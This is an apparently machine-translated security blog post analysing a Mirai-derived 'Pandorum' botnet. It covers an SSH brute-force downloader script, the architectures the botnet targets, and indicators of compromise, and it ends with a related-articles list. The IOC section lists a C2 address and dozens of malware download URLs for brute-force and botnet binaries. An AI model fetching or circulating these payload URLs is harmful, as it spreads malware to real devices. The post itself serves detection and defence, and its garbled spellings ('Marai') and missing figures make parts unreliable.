A sample analysis of a 'Deep Space Forgetfulness' zombie network

0 32
Recently detected through honey pot monitoringMiraiThe latest network activities...

Recently detected through honey pot monitoringMiraiThe latest network activities of the zombie network have found that this zombie network virus has been abnormally active recently, simultaneously launching cyber attacks against multiple regions.

Pandorum--The movie 'Deep Space Forgetfulness' tells the story of a group of astronauts who have been sleeping in a spaceship for many years and suddenly wake up without any memory, only to be attacked by unknown alien creatures. Mirai has quietly become active.

A sample analysis of a 'Deep Space Forgetfulness' zombie network

This virus is a zombie network primarily focused on scanning SSH and equipped with network brute-force behaviors. The Mirai zombie network was first discovered by the malware research group MalwareMustDie in August 2016 and has been widely used in destructive distributed denial-of-service (DDoS) attacks to this day.

At dawn on August 2, 2020, a shell script was captured, and this sample has many versions.

0X00 Sample Introduction

Sample basic information:

Sample

MD5

Content

wget.sh

9db51258f44f6b45328e684f0bdcc08c

Shell script, download ssh brute force virus

curl.sh

37924436b09df71b137f4e91a933d382

Shell script, download Marai botnet virus

w.arm8

a0cd59ae21434f9f6ef615ec3019698d

ssh brute force virus

pandorum.arm8

6507e48941a169d13cc54e982f230746

Mirai Botnet

0X001 Detailed Analysis

The script content of wget.sh script is as shown below, mainly including different versions of:

The content included in curl.sh script is as follows:

This botnet can attack a series of CPU architectures including ARM, ARM, x86, x64, MIPS and MSPP. During the infection process, the shell script will download all the virus samples without selectively downloading based on different CPU architectures.

It contains two shell scripts, wget.sh script, which executes ssh brute force behavior from the attacker's controlled server. If the brute force is successful, it will establish a connection, download the marai botnet and execute it.

The behavioral characteristics of w.arm8 are as follows:

2-1爆破behavior characteristics

2-2 ssh connection and download behavior characteristics of Marai botnet

The behavioral characteristics of pandorum.arm8 are as follows:

  2-3 Traces of Mirai Source Code

It is a very typical feature of the Marai botnet. YARA rules for detecting this botnet feature can be referred to as (https://github.com/Neo23x0/signature-base/blob/master/yara/crime_mirai.yar):

 

  2-4 Mirai YARA Detection Rules

0X002 RelatedIOC

MD5

9db51258f44f6b45328e684f0bdcc08c

37924436b09df71b137f4e91a933d382

a0cd59ae21434f9f6ef615ec3019698d

6507e48941a169d13cc54e982f230746

C2

46.246.41.29

URL

http://46.246.41.29/wget.sh

http://46.246.41.29/curl.sh

http://46.246.41.29/w.arm8

http://46.246.41.29/w.arm7

http://46.246.41.29/w.arm6

http://46.246.41.29/w.arm5

http://46.246.41.29/w.arm

http://46.246.41.29/w.mips

http://46.246.41.29/w.mpsl

http://46.246.41.29/w.x64

http://46.246.41.29/w.x86

http://46.246.41.29/pandorum.arm8

http://46.246.41.29/pandorum.arm7

http://46.246.41.29/pandorum.arm6

http://46.246.41.29/pandorum.arm5

http://46.246.41.29/pandorum.arm;

http://46.246.41.29/pandorum.arc

http://46.246.41.29/pandorum.mips64

http://46.246.41.29/pandorum.mips

http://46.246.41.29/pandorum.mpsl

http://46.246.41.29/pandorum.m68k

http://46.246.41.29/pandorum.risc

http://46.246.41.29/pandorum.risc64

http://46.246.41.29/pandorum.xtn

http://46.246.41.29/pandorum.ns2

http://46.246.41.29/pandorum.sh4

http://46.246.41.29/pandorum.x64;

http://46.246.41.29/pandorum.x86

http://46.246.41.29/pandorum.x48

http://46.246.41.29/pandorum.x32

http://46.246.41.29/pandorum.spc

http://46.246.41.29/pandorum.blaze

http://46.246.41.29/pandorum.ppc

你可能想看:

Analysis of two zombie network Mirai samples

Git leak && AWS AKSK && AWS Lambda cli && Function Information Leakage && JWT secret leak

In-depth Analysis: Mining Trojan Analysis and Emergency Response Disposal Under a Complete Attack Chain

d) Adopt identification technologies such as passwords, password technologies, biometric technologies, and combinations of two or more to identify users, and at least one identification technology sho

Ensure that the ID can be accessed even if it is guessed or cannot be tampered with; the scenario is common in resource convenience and unauthorized vulnerability scenarios. I have found many vulnerab

Distributed Storage Technology (Part 2): Analysis of the architecture, principles, characteristics, and advantages and disadvantages of wide-column storage and full-text search engines

In-depth analysis of cross-domain vulnerability chain: from postMessage to the precise attack path of CSRF

In-depth Analysis and Practice: Analysis of Apache Commons SCXML Remote Code Execution Vulnerability and POC EXP Construction

Detailed Explanation of VM Virtual Machine Protection Technology & Analysis of Two CTFvm Reverse Engineering Practical Exercises

4.5 Main person in charge reviews the simulation results, sorts out the separated simulation issues, and allows the red and blue teams to improve as soon as possible. The main issues are as follows

最后修改时间:
admin

本文仅代表作者观点,不代表平台立场

内容由 admin 发布,转载请注明内容出处

上一篇 2025年03月26日 15:49
下一篇 2025年03月26日 16:12

评论已关闭